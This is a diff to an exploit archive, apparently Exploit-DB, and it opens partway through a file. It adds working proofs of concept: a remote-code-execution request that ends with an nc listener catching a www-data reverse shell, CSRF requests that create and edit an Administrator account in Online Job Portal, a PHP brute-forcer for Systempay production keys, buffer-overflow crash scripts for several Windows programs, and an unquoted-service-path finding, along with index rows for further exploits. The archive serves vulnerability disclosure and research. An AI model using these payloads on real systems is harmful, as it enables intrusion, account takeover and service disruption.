text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \ + $'http://localhost/[PATH]/admin/user/photos/exp.php' +# +root@ihsan:~/ExploitDB# nc -nlvp 6666 +Ncat: Version 7.80 ( https://nmap.org/ncat ) +Ncat: Listening on :::6666 +Ncat: Listening on 0.0.0.0:6666 +Ncat: Connection from 192.168.1.104. +Ncat: Connection from 192.168.1.104:35574. +id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +# \ No newline at end of file diff --git a/exploits/php/webapps/48016.txt b/exploits/php/webapps/48016.txt new file mode 100644 index 000000000..7fde420c7 --- /dev/null +++ b/exploits/php/webapps/48016.txt @@ -0,0 +1,49 @@ +# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User) +# Dork: N/A +# Date: 2020-02-06 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip +# Version: 1.0 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# Add User.. +# +POST /admin/user/controller.php?action=add HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 106 +Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save= +# + +# POC: +# 2) +# Edit User.. +# +POST /admin/user/controller.php?action=edit HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 121 +Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save= +# \ No newline at end of file diff --git a/exploits/php/webapps/48017.php b/exploits/php/webapps/48017.php new file mode 100644 index 000000000..7ec568921 --- /dev/null +++ b/exploits/php/webapps/48017.php @@ -0,0 +1,98 @@ +# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force +# Author: live3 +# Date: 2020-02-05 +# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ +# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ +# Tested on: MacOs +# Version: ALL + +'; + +$found = false; +$get_key = ''; + +// first check +if (sha1($sentence.$last_key_check) != $signature_from_post) { + for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) { + $get_key = $i; + if (sha1($sentence.$i) == $signature_from_post) { + echo 'Key found : '.$i.'
'; + $found = true; + break; + } + } +} else { + $found = true; +} + + +if ($found) { + $test_sha = sha1($sentence.$get_key); + echo 'Signature calc : '.$test_sha.'
'; +} else { + echo 'Last key check : '.$get_key.'
'; +} + + +echo 'Your sequence : '.$sentence.'
'; \ No newline at end of file diff --git a/exploits/windows/dos/48005.py b/exploits/windows/dos/48005.py new file mode 100755 index 000000000..739e0c71f --- /dev/null +++ b/exploits/windows/dos/48005.py @@ -0,0 +1,22 @@ +# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe +# Tested Version: 11.12 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: AbsoluteTelent 11.12_license_code.py +#2.- Open AbsoluteTelent_license_code.txt and copy content to clipboard +#3.- Open AbsoluteTelnet.exe +#4.- Select "Help" > "Enter License Key" +#5.- In "License code" paste Clipboard +#6.- Crashed + +cod = "\x41" * 2500 + +f = open('AbsoluteTelent_license_code.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48006.py b/exploits/windows/dos/48006.py new file mode 100755 index 000000000..8b24a206d --- /dev/null +++ b/exploits/windows/dos/48006.py @@ -0,0 +1,23 @@ +# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe +# Tested Version: 11.12 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + + +#Steps to produce the crash: +#1.- Run python code: AbsoluteTelent 11.12_license_name.py +#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard +#3.- Open AbsoluteTelnet.exe +#4.- Select "Help" > "Enter License Key" +#5.- In "License Name" paste Clipboard +#6.- Crashed + +cod = "\x41" * 2500 + +f = open('AbsoluteTelent_license_name.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48010.py b/exploits/windows/dos/48010.py new file mode 100755 index 000000000..5323012db --- /dev/null +++ b/exploits/windows/dos/48010.py @@ -0,0 +1,22 @@ +# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe +# Tested Version: 11.12 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py +#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard +#3.- Open AbsoluteTelnet +#4.- Select "new connection file", "Connection", "SSH2", "Use last username" +#5.- In "username" field paste Clipboard +#6.- Select "OK" +#7.- Crashed + +buffer = "\x41" * 1000 +f = open ("absolutetelnet_username_SSH2.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48011.py b/exploits/windows/dos/48011.py new file mode 100755 index 000000000..bba3208c2 --- /dev/null +++ b/exploits/windows/dos/48011.py @@ -0,0 +1,24 @@ +# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html +# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe +# Tested Version: 2.12.3 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: tapinadio_address.py +#2.- Open tapin_add.txt and copy content to clipboard +#3.- Open TapinRadio +#4.- Select "Settings" > "Preferences" > "Miscellaneous" +#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard +#6.- In Port type "444" > "Username" type "test" > Password type "1234" +#7.- Select "OK" and "OK" +#8.- Crashed + +cod = "\x41" * 3000 + +f = open('tapin_add.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48013.py b/exploits/windows/dos/48013.py new file mode 100755 index 000000000..3072578d8 --- /dev/null +++ b/exploits/windows/dos/48013.py @@ -0,0 +1,24 @@ +# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html +# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe +# Tested Version: 2.12.3 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: tapinadio_user.py +#2.- Open tapin_user.txt and copy content to clipboard +#3.- Open TapinRadio +#4.- Select "Settings" > "Preferences" > "Miscellaneous" +#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard +#6.- In Server type "1.1.1.1" > Port type 444 > Password type "1234" +#7.- Select "OK" and "OK" +#8.- Crashed + +cod = "\x41" * 10000 + +f = open('tapin_user.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48014.py b/exploits/windows/dos/48014.py new file mode 100755 index 000000000..b2a9df448 --- /dev/null +++ b/exploits/windows/dos/48014.py @@ -0,0 +1,21 @@ +# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-02-05 +# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html +# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe +# Tested Version: 2.72.4 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: rarmaradio_username.py +#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard +#3.- Open RarmaRadio +#4.- Select "Edit" > "Settings" > "Network" +#5.- In "Username" field paste Clipboard +#6.- Select "OK" +#7.- Crashed +buffer = "\x41" * 5000 +f = open ("RarmaRadio2.72.4_username.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48015.py b/exploits/windows/dos/48015.py new file mode 100755 index 000000000..63a6917f6 --- /dev/null +++ b/exploits/windows/dos/48015.py @@ -0,0 +1,22 @@ +# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 05-02-2020 +# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html +# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe +# Tested Version: 2.72.4 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +#1.- Run python code: RarmaRadio2.72.4_server.py +#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard +#3.- Open RarmaRadio +#4.- Select "Edit" > "Settings" > "Network" +#5.- In "Server" field paste Clipboard +#6.- Select "OK" +#7.- Crashed + +buffer = "\x41" * 4000 +f = open ("RarmaRadio2.72.4_server.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48009.txt b/exploits/windows/local/48009.txt new file mode 100644 index 000000000..28e3ec2cb --- /dev/null +++ b/exploits/windows/local/48009.txt @@ -0,0 +1,25 @@ +#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path +#Exploit Author : ZwX +#Exploit Date: 2020-02-05 +#Vendor : ELAN Microelectronics +#Vendor Homepage : http://www.emc.com.tw/ +#Tested on OS: Windows 10 v1803 + + +#Analyze PoC : +============== + + +C:\Users\ZwX>sc qc ETDService +[SC] QueryServiceConfig réussite(s) + +SERVICE_NAME: ETDService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Elan Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c8746fec7..c3ce8e278 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6666,6 +6666,14 @@ id,file,description,date,author,type,platform,port 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux, 47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios, +48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux, +48010,exploits/windows/dos/48010.py,"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48011,exploits/windows/dos/48011.py,"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, +48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10928,6 +10936,7 @@ id,file,description,date,author,type,platform,port 47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux, 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux, 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux, +48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42300,3 +42309,10 @@ id,file,description,date,author,type,platform,port 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java, 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json, 48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json, +48007,exploits/php/webapps/48007.txt,"Online Job Portal 1.0 - 'user_email' SQL Injection",2020-02-06,"Ihsan Sencan",webapps,php, +48012,exploits/php/webapps/48012.txt,"Online Job Portal 1.0 - Remote Code Execution",2020-02-06,"Ihsan Sencan",webapps,php, +48016,exploits/php/webapps/48016.txt,"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)",2020-02-06,"Ihsan Sencan",webapps,php, +48017,exploits/php/webapps/48017.php,"Ecommerce Systempay 1.0 - Production KEY Brute Force",2020-02-06,live3,webapps,php, +48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java, +48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java, +48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,